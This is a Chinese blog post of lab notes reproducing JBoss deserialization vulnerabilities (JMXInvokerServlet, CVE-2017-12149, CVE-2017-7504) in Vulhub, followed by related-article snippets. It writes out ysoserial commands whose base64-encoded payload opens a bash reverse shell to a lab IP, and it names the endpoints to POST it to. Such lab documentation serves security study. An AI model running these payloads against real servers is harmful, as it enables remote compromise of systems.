jboss漏洞复现

最新推荐文章于 2024-04-25 12:32:22 发布
最新推荐文章于 2024-04-25 12:32:22 发布
阅读量720 收藏
点赞数
文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43123409/article/details/121472736
版权

JBoss JMXInvokerServlet 反序列化漏洞

https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/
https://paper.seebug.org/312/
https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/

JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

初始化完成后访问http://your-ip:8080/即可看到JBoss默认页面。
在这里插入图片描述
访问192.168.33.130:8080/invoker/JMXInvokerServlet只要有文件下载,目标网站即存在JBoss JMXInvokerServlet 反序列化漏洞。
在这里插入图片描述

JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象,所以我们直接将ysoserial生成好的POC附在POST Body中发送即可。

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

在这里插入图片描述在这里插入图片描述

EXP,比如DeserializeExploit.jar,直接用该工具执行命令、上传文件即可:
(工具不给力呀)
在这里插入图片描述

https://bbs.ichunqiu.com/thread-26613-1-1.html

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg

在这里插入图片描述
所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。

编写反弹shell的命令

使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码:http://www.jackson-t.ca/runtime-exec-payloads.html
在这里插入图片描述
得到编码后命令

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}

序列化数据生成

使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjEyOS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

发送POC

生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:
不知道为啥不成功
在这里插入图片描述

成功反弹shell:
并没有
在这里插入图片描述

https://blog.csdn.net/Jerry____/article/details/103506224
在这里插入图片描述

https://www.cnblogs.com/yuzly/p/11240145.html
这个工具 ↓ 可以 https://github.com/yunxu1/jboss-_CVE-2017-12149
在这里插入图片描述

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

在这里插入图片描述。。。

鲨鱼饿死了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
jboss中间件漏洞复现
mingyqf的博客
02-15 1383
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 648
vulhub漏洞复现-jboss反序列化漏洞
JBoss漏洞复现(保姆级教学)
最新发布
m0_69043895的博客
04-25 630
漏洞原理:该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞。这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码。在自己服务器上部署一个webshell的war包。然后再压缩成war文件。
JBoss历史漏洞汇总与复现
m0_48108919的博客
04-02 6845
前言:jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 默认端口:8080,9990 一、jboss 代码执行 (CVE-2017-12149) ...
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 1791
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
Jboss漏洞利用小工具
11-06
在过去的几年中,由于其广泛使用,JBoss也成为了黑客们的目标,存在一些安全漏洞,这些漏洞如果被恶意利用,可能会导致系统被攻击者控制、数据泄露或服务中断。本文将深入探讨JBoss漏洞利用及其防范措施。 1. **...
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Jboss漏洞利用总结1
08-03
JBoss 漏洞利用总结】 JBoss 是一款基于 J2EE 的开源应用服务器,遵循 LGPL 许可,允许在商业应用中免费使用。它主要作为 EJB 容器和服务器,支持 EJB 1.1、2.0 和 3.0 规范。虽然 JBoss 核心服务不包含 Web 容器...
Jboss漏洞利用
u011215939的博客
01-23 8124
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
Jboss反序列化漏洞复现(CVE-2017-12149)
WY92139010的博客
07-30 709
Jboss反序列化漏洞复现(CVE-2017-12149) 一、漏洞描述 该漏洞Java反序列化错误类型,存在于jboss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、漏洞影响版本 Jboss 5.x Jboss 6.x 三、漏洞复现环境搭建...
jboss常见漏洞复现
可爱的我可爱的code
11-19 770
JBoss 5.x/6.x 反序列化漏洞( CVE-2017-12149 ) 验证: 访问/invoker/readonly,如果返回 500 ,说明页面存在,此页面存在反序列化漏洞。 利用工具:JavaDeserH2HC 步骤: 1.先编译 # 我们选择一个 Gadget : ReverseShellCommonsCollectionsHashMap ,编译并生成序列化数据 javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsColl
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
CVE-2017-12149JBOSS漏洞复现
ranuy阮的博客
05-07 1812
漏洞描述 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据...
JBoss漏洞总结
qq1325928591的博客
12-28 4036
近期遇到一次考核,两题都是关于jboss的相关漏洞,虽然都复现过,毕竟脑子有限,还是进行总结一下 jboss一般有2种类型的的漏洞: a.访问控制不严导致的漏洞 b.反序列化漏洞 Jboss管理控制台说明 jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 /web-console/ jmx-console的配置文件为: /opt/jboss/jboss4/server/default/deploy/jmx-console.war/WEB-INF/jboss-w
jboss反序列化漏洞复现(CVE-2017-7504)
WY92139010的博客
07-31 567
jboss反序列化漏洞复现(CVE-2017-7504) 一、漏洞描述 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二、漏洞环境搭建以及复现 1、使用docker搭建漏洞环境...
jboss漏洞利用
mirror97black的博客
01-24 8262
JBOSS JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。 使用工具 msf,jexboss,zoomeye,fofa 下载jexboss 在github中搜索jexboss下载漏洞利用代码
tomcat weblogic jboss 漏洞
12-16
过去,Jboss也存在过一些漏洞,比如JMX控制台未授权访问漏洞和远程代码执行漏洞。这些漏洞可能会被利用来执行恶意操作和窃取数据。 为了防止这些漏洞对系统造成危害,用户应该及时安装官方发布的补丁和更新,加强...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值